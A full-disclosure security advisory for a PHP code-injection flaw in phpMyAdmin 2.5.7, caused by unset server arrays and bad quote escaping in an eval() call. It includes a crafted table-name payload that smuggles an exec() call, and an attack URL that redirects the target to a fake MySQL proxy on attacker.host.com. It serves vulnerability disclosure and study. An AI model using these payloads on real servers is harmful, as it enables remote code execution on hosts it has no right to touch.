php code injection in phpMyAdmin-2.5.7
Software : phpMyAdmin
Version : 2.5.7
Vendor : http://www.phpmyadmin.net/
Vulnerability : php codes injection (if $cfg['LeftFrameLight'] set to FALSE)
Problem-Type : remote user
phpMyAdmin is web-based mysql administration written in PHP.
There is a vulnerability in phpMyAdmin version 2.5.7.
This vulnerability would allow remote user to inject php codes
to be executed by eval() function (in file left.php).
However, This vulnerability only effect if variable $cfg['LeftFrameLight']
set to FALSE (in file config.inc.php)
1. Bugs
1.a. Ability to grow up array variables by way of GET params
PhpMyAdmin has multiple servers configuration stored
in array variables ($cfg['Servers'][$i]). They are coded in file config.inc.php.
They are usually set at instalation time by owner.
Each configuration contains mysql server information to be used
by phpMyAdmin as host, port, user, password, authentication type, database name etc of mysql server.
Up to three servers configuration is provided by default.
However, Uninitialized $cfg['Servers'][$i] allows remote user to add server
configuration to the list of servers configuration by growing up
$cfg['Servers'][$i] array through GET parameters.
Remote user could add server configuration like this
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg;[Servers][4][host]=202.81.x.x&cfg;[Servers][4][port]=8888&cfg;[Servers][4][user]=alice .. and so forth.
The running script will use the fourth server configuration which remote user supply.
1.b. Escape 'magic' quote (') oops
if variable $cfg['LeftFrameLight'] set to FALSE, this part of codes is executed.
$eval_string = '$tablestack[\'' . implode('\'][\'', $_table) . '\'][\'pma_name\'][] = \'' . str_replace('\'', '\\\'', $table) . '\';';
eval($eval_string);
$eval_string will be php codes that executed by function eval().
if we have one table named 'mytable', $eval_string will have string value
$tablestack['']['pma_name'][] = 'mytable';
phpMyAdmin is improper to handle escaping single quote.
So that with crafted table name with its name contains meta-chars like this
\\';exec(\"touch /tmp/touchable\");/*
$eval_string will have value
$tablestack['']['pma_name'][] = '\\';exec("touch /tmp/touchable");/*';
In php language, It consists of three php statements.
The last statement without trailing comment just give a warning message in php.
2. Exploite
Since mysql does not allow table name contain meta-chars, we have to provide a
wrapper of mysql server and acts as a proxy except that it will sends a fake
table name, when client query "SHOW TABLES", by replacing the real table name
with a string contains exploite codes.
http://target/phpMyAdmin-2.5.7/left.php?server=4&cfg;[Servers][4][host]=attacker.host.com&cfg;[Servers][4][port]=8889&cfg;[Servers][4][auth_type]=config&cfg;[Servers][4][user]=user&cfg;[Servers][4][password]=pass&cfg;[Servers][4][connect_type]=tcp&&cfg;[Servers][4][only_db]=databasename
In attacker.host.com mysql wrapper will listen in port 8889 waiting for connection.
3. Proof of Concept
This mysql wrapper written in c that can be founded in attachment
or from http://eagle.kecapi.com/sec/codes/phpmy-expt.c
4. Purpose
This full disclosure is intended to be educational purpose. Nothing else.